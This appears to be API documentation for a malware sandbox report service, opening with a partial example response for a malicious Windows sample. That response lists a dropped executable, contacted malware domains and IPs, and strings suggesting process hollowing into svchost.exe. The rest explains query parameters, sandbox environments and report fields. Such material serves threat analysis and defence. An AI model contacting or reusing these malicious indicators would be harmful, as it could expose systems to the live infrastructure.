"name": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"size": 0,
"crc32": "00000000",
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
"ssdeep": "3::",
"type": "empty",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"pid": 6968,
"process_name": "svchost.exe"
}
],
"https_ex": [],
"dead_hosts": [],
"domains": [
{
"domain": "bdcrqgonzmwuehky.nl",
"ip": "176.58.104.168"
},
{
"domain": "somicrososoft.ru",
"ip": "3.229.117.57"
}
],
"hosts": [
"3.229.117.57",
"176.58.104.168"
]
},
"dropped": [
{
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"threat_level": "malicious",
"urls": [],
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"size": 64000,
"filepath": "C:\\ProgramData\\Local Settings\\Temp\\msajyt.cmd",
"name": "msajyt.cmd",
"crc32": "49F50535",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"yara": [],
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
],
"strings": {
"5612_88165644311524082025": [
";x\\&:}V*",
"hdll.hsbie",
"kernel32.dll",
".]a[<HI",
"hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst",
"h.dllhpi32hadva",
"!This program cannot be run in DOS mode."
],
"5612_51029104311524082025": [
"ntdll.dll",
"lstrcatW",
"CloseHandle",
"\\syswow64\\svchost.exe",
"\\system32\\wuauclt.exe",
"VirtualFree",
"NtDelayExecution",
"ZwUnmapViewOfSection",
"ZwQueryInformationProcess"
],
"pcap": [
"DESKTOP-H9URB7T ",
"bigcatalog",
"MSFT 5.0",
"Date: Sun, 24 Aug 2025 15:02:07 GMT",
"edgekey",
" EEEFFDELFEEPFACNEIDJFFFCECDHFECA",
"!http://oneocsp.microsoft.com/ocsp0",
"sidnlabs"
]
}
}Query Parameters
Your API key. For details on how to obtain and manage your API key, please refer to the Authentication page.
Kindly note:
Please check if you have bound your access IP to the key and have the authority quotas to access this API before you interact with it.
The file hash value used to retrieve the analysis report.
Supports sha256 / sha1 / md5.
Sandbox Runtime Environment
Users can specify the sandbox runtime environment for the file to view dynamic analysis data in that specific environment (including behavioral signatures, process behavior, network behavior, dropped behavior, etc.).
The optional environments include:
-
Windows:
- win7_sp1_enx64_office2013
- win7_sp1_enx86_office2013
- win7_sp1_enx86_office2010
- win7_sp1_enx86_office2007
- win7_sp1_enx86_office2003
- win10_1903_enx64_office2016
-
Linux:
- ubuntu_1704_x64
- centos_7_x64
-
Kylin:
- kylin_desktop_v10
Optional data includes:
- summary
- network
- signature
- static
- dropped
- pstree
- multiengines
- strings
Response
Hide child attributes
Hide child attributes
-
result: Detection status from each antivirus engine.
-
safe: The engine did not detect any threats.
-
malware_label: A specific label indicating the type of malware detected. For example, Trojan.e32du.
-
scan_time: The exact timestamp when the sample was scanned by multiple engines. The format is YYYY-MM-DD HH:MM:SS. For example, 2019-10-22 16:17:48.
Summary Information
A JSON object with the following fields:
-
threat_level: Threat level. Four categories:
malicious,suspicious,clean,unknown.
This threat level is a comprehensive judgment result combining dynamic analysis across static analysis, multi-engines, and multiple sandbox environments. -
malware_type: Threat category.
-
malware_family: Malware family, e.g.,
Xorddos. -
is_whitelist: Whether the file is on the whitelist.
truemeans whitelisted,falsemeans not. -
submit_time: File submission time.
- Example:
2019-01-22 17:36:21
- Example:
-
file_name: File name.
-
file_type: File type.
-
sample_sha256: File hash (SHA256).
-
md5: File MD5 hash.
-
sha1: File SHA1 hash.
-
scenes: Scenario detection results.
- Cybercrime: Cybercrime sample.
- CS_Detect: CobaltStrike trojan sample.
- RT_Tools: Red team tool.
- Exploit: Exploit sample.
-
tag: Tags. A JSON object containing:
- s: Static tags (JSON array). Example:
"Abnormal timestamp". For common tags, see “Common Sample Tags”. - x: Antivirus engine detection tags (JSON array). Example:
"Trojan".
- s: Static tags (JSON array). Example:
-
threat_score: Threat score value.
-
sandbox_type: The sandbox environment specified for the current analysis.
-
sandbox_type_list: List of all sandbox environments where the sample was successfully analyzed.
-
multi_engines: Antivirus engine detection rate.
- Example:
"7/25"
- Example:
Behavioral Signatures
A JSON array, where each item includes the following fields:
- severity: Severity level (integer). A higher number indicates higher severity.
- references: References (JSON array).
- sig_class: Signature category (string).
- name: Signature name (string).
- description: Behavior description.
- markcount: Mark count (integer).
- marks: Raw signature data (JSON array).
- families: Associated malware families (JSON array).
- attck_id: ATT&CK ID (integer).
- attck_info: ATT&CK details (JSON array).
Static Information
A JSON object.
Process Tree Information
Network Behavior A JSON object with the following fields:
- fingerprint: Fingerprint information (JSON array).
- tls: TLS protocol (JSON array).
- udp: UDP protocol (JSON array).
- dns_servers: DNS servers (JSON array).
- http: HTTP protocol (JSON array).
- irc: IRC protocol (JSON array).
- smtp: SMTP protocol (JSON array).
- tcp: TCP protocol (JSON array).
- smtp_ex: Extended SMTP protocol data (JSON array).
- mitm: Man-in-the-middle data (JSON array).
- hosts: Network hosts (JSON array).
- dns: Domain Name System (JSON array).
- http_ex: Extended HTTP protocol data (JSON array).
- domains: Domains (JSON array).
- dead_hosts: Unreachable hosts (JSON array).
- icmp: ICMP protocol (JSON array).
- https_ex: Extended HTTPS protocol data (JSON array).
Dropped Behavior
A JSON array, where each item includes the following fields:
- sha1: File SHA1 value (string).
- sha256: File SHA256 value (string).
- md5: File MD5 value (string).
- urls: Extracted URLs (JSON array).
- size: File size (integer).
- filepath: File path (string).
- name: File name (string).
- crc32: File CRC32 value (string).
- ssdeep: File SSDeep value (string).
- type: File type (string).
- yara: YARA matches (JSON array).
Strings Information
A JSON object, where each item includes the following fields:
- sha256: Strings extracted from the file. Based on the SHA256 value, corresponds to the file’s static strings (array).
- pcap: Strings extracted from network traffic (array).
⌘I